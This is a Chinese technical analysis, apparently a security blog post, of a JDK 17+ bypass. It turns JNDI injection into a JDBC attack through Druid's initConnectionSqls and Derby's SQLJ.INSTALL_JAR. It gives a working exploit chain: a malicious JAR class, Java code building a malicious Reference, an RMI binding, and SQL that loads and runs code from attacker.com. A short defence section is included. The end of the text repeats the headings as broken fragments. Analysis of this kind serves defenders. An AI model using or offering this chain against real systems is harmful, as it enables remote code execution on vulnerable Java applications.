高版本JDK下Derby配合Druid转换JNDI注入为Jdbc攻击绕过技术分析<\/h1>

一、漏洞背景与原理<\/h2>
本技术文档分析了一种在高版本JDK环境下（如JDK 17），通过结合Apache Derby数据库和Druid连接池，将JNDI注入漏洞转换为JDBC攻击的绕过技术。<\/p>

核心原理<\/h3>

JNDI注入限制<\/strong>：高版本JDK（如17+）对JNDI注入进行了严格限制，传统的利用方式（如LDAP\/RMI引用加载远程类）被阻断<\/li>
技术转换<\/strong>：通过Druid连接池的特定配置，将JNDI注入转换为可控的JDBC SQL注入<\/li>

Derby特性利用<\/strong>：利用Apache Derby数据库的INSTALL_JAR<\/code>功能加载远程恶意JAR并执行其中的静态方法<\/li> <\/ol> 二、环境依赖<\/h2> 必要组件<\/h3> 数据库<\/strong>：Apache Derby 10.14.2.0+<\/li> 连接池<\/strong>：Druid连接池<\/li> JDK版本<\/strong>：JDK 17（高版本限制环境下）<\/li> 其他依赖<\/strong>：无特殊要求<\/li> <\/ul> 三、技术细节分析<\/h2> 1. Derby数据库的RCE能力<\/h3> Apache Derby提供了通过SQL加载远程JAR并执行其中方法的能力：<\/p> -- 1. 安装远程JAR <\/span><\/span><\/span><\/span>CALL<\/span> SQLJ.INSTALL_JAR('http:\/\/attacker.com\/Evil.jar'<\/span>, 'APP.EvilJar'<\/span>, 0<\/span>); <\/span><\/span> <\/span><\/span>-- 2. 将JAR添加到类路径 <\/span><\/span><\/span><\/span>CALL<\/span> SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath'<\/span>, 'APP.EvilJar'<\/span>); <\/span><\/span> <\/span><\/span>-- 3. 创建存储过程调用JAR中的静态方法 <\/span><\/span><\/span><\/span>CREATE<\/span> PROCEDURE<\/span> evilMethod() <\/span><\/span>PARAMETER<\/span> STYLE JAVA <\/span><\/span>LANGUAGE<\/span> JAVA <\/span><\/span>EXTERNAL<\/span> NAME 'com.example.EvilClass.execute'<\/span>; <\/span><\/span> <\/span><\/span>-- 4. 调用存储过程执行RCE <\/span><\/span><\/span><\/span>CALL<\/span> evilMethod(); <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 方法必须是static<\/code>方法<\/li> JAR需要托管在可访问的Web服务器上<\/li> Derby的INSTALL_JAR<\/code>功能允许直接从URL加载JAR<\/li> <\/ul> 2. Druid连接池的利用点<\/h3> Druid连接池的DruidDataSourceFactory<\/code>类存在可利用的初始化参数：<\/p> public<\/span> Object getObjectInstance<\/span>(<\/span>Object obj,<\/span> Name name,<\/span> Context nameCtx,<\/span> Hashtable<?,<\/span> ?><\/span> environment)<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> Reference reference =<\/span> (<\/span>Reference)<\/span>obj;<\/span> <\/span><\/span> StringRefAddr driverClassName =<\/span> (<\/span>StringRefAddr)<\/span>reference.<\/span>get<\/span>(<\/span>"driverClassName"<\/span>);<\/span> <\/span><\/span> StringRefAddr url =<\/span> (<\/span>StringRefAddr)<\/span>reference.<\/span>get<\/span>(<\/span>"url"<\/span>);<\/span> <\/span><\/span> StringRefAddr username =<\/span> (<\/span>StringRefAddr)<\/span>reference.<\/span>get<\/span>(<\/span>"username"<\/span>);<\/span> <\/span><\/span> StringRefAddr password =<\/span> (<\/span>StringRefAddr)<\/span>reference.<\/span>get<\/span>(<\/span>"password"<\/span>);<\/span> <\/span><\/span> StringRefAddr initConnectionSqls =<\/span> (<\/span>StringRefAddr)<\/span>reference.<\/span>get<\/span>(<\/span>"initConnectionSqls"<\/span>);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键参数<\/strong>：<\/p> initConnectionSqls<\/code>：可指定初始化SQL语句，多个语句用分号分隔<\/li> 这些参数通过StringRefAddr<\/code>传入，只能为字符串类型<\/li> <\/ul> 3. 攻击链构建<\/h3> JNDI注入点<\/strong>：应用存在可控的lookup()<\/code>调用<\/li> Druid利用<\/strong>：构造恶意的Reference<\/code>对象，设置initConnectionSqls<\/code>参数<\/li> Derby执行<\/strong>：initConnectionSqls<\/code>中包含利用Derby加载远程JAR并执行的SQL<\/li> RCE达成<\/strong>：远程JAR中的恶意静态方法被执行<\/li> <\/ol> 四、完整攻击步骤<\/h2> 1. 准备恶意JAR<\/h3> 创建包含静态方法的Java类：<\/p> \/\/ EvilClass.java <\/span><\/span><\/span><\/span>package<\/span> com.example;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> EvilClass<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> execute<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>编译并打包：<\/p> javac EvilClass.java <\/span><\/span>jar cvf Evil.jar EvilClass.class <\/span><\/span><\/code><\/pre>将Evil.jar<\/code>托管在Web服务器上（如http:\/\/attacker.com\/Evil.jar<\/code>）<\/p> 2. 构造恶意Reference<\/h3> 创建恶意的JNDI Reference对象：<\/p> Reference ref =<\/span> new<\/span> Reference(<\/span>"javax.sql.DataSource"<\/span>,<\/span> <\/span><\/span> "com.alibaba.druid.pool.DruidDataSourceFactory"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置基本JDBC参数 <\/span><\/span><\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"driverClassName"<\/span>,<\/span> "org.apache.derby.jdbc.EmbeddedDriver"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"url"<\/span>,<\/span> "jdbc:derby:memory:testdb;create=true"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"username"<\/span>,<\/span> "user"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"password"<\/span>,<\/span> "pass"<\/span>));<\/span> <\/span><\/span> <\/span><\/span>\/\/ 设置恶意SQL <\/span><\/span><\/span><\/span>String evilSql =<\/span> "CALL SQLJ.INSTALL_JAR('http:\/\/attacker.com\/Evil.jar', 'APP.EvilJar', 0);"<\/span> +<\/span> <\/span><\/span> "CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP.EvilJar');"<\/span> +<\/span> <\/span><\/span> "CREATE PROCEDURE evilMethod() PARAMETER STYLE JAVA LANGUAGE JAVA EXTERNAL NAME 'com.example.EvilClass.execute';"<\/span> +<\/span> <\/span><\/span> "CALL evilMethod()"<\/span>;<\/span> <\/span><\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"initConnectionSqls"<\/span>,<\/span> evilSql));<\/span> <\/span><\/span><\/code><\/pre>3. 部署恶意JNDI服务<\/h3> 可以使用RMI或LDAP服务发布这个Reference对象：<\/p> \/\/ 示例：RMI服务 <\/span><\/span><\/span><\/span>ReferenceWrapper wrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span> <\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"evilDS"<\/span>,<\/span> wrapper);<\/span> <\/span><\/span><\/code><\/pre>4. 触发攻击<\/h3> 当受害者应用调用lookup("rmi:\/\/attacker.com\/evilDS")<\/code>时：<\/p> Druid会解析Reference并创建数据源<\/li> 初始化时执行initConnectionSqls<\/code>中的SQL<\/li> Derby加载远程JAR并执行恶意方法<\/li> <\/ol> 五、防御措施<\/h2> 1. 针对开发人员<\/h3> 避免使用不可信的JNDI查找<\/li> 限制Druid的配置来源<\/li> 禁用Derby的INSTALL_JAR<\/code>功能（如可能）<\/li> <\/ul> 2. 针对运维人员<\/h3> 升级Derby到最新版本并检查安全配置<\/li> 网络层面限制出站连接，防止加载远程JAR<\/li> 监控异常的数据库操作<\/li> <\/ul> 3. 通用建议<\/h3> 使用最新版本的JDK和组件<\/li> 实施最小权限原则<\/li> 定期安全审计和漏洞扫描<\/li> <\/ul> 六、技术限制与变种<\/h2> 技术限制<\/h3> 依赖Derby数据库的使用<\/li> 需要Druid连接池的特定版本<\/li> 需要出站网络连接加载JAR<\/li> <\/ul> 可能的变种<\/h3> 使用其他支持远程代码加载的数据库（如H2）<\/li> 结合其他连接池的类似特性<\/li> 利用数据库内置函数实现无文件RCE<\/li> <\/ol> 七、参考资源<\/h2> Apache Derby官方文档 - INSTALL_JAR功能<\/li> Druid连接池源码分析<\/li> JDK 17安全增强说明<\/li> JNDI注入防御最佳实践<\/li> <\/ol> 通过这种技术，攻击者可以在高版本JDK的限制环境下，通过转换攻击面实现RCE，展示了现代应用安全中组件交互带来的复杂攻击面。<\/p>

高版本JDK下Derby配合Druid转换JNDI注入为Jdbc攻击绕过技术分析<\/h1>

一、漏洞背景与原理<\/h2> 本技术文档分析了一种在高版本JDK环境下（如JDK 17），通过结合Apache Derby数据库和Druid连接池，将JNDI注入漏洞转换为JDBC攻击的绕过技术。<\/p>

二、环境依赖<\/h2>

三、技术细节分析<\/h2>

四、完整攻击步骤<\/h2>

五、防御措施<\/h2>

六、技术限制与变种<\/h2>

一、漏洞背景与原理<\/h2>
本技术文档分析了一种在高版本JDK环境下（如JDK 17），通过结合Apache Derby数据库和Druid连接池，将JNDI注入漏洞转换为JDBC攻击的绕过技术。<\/p>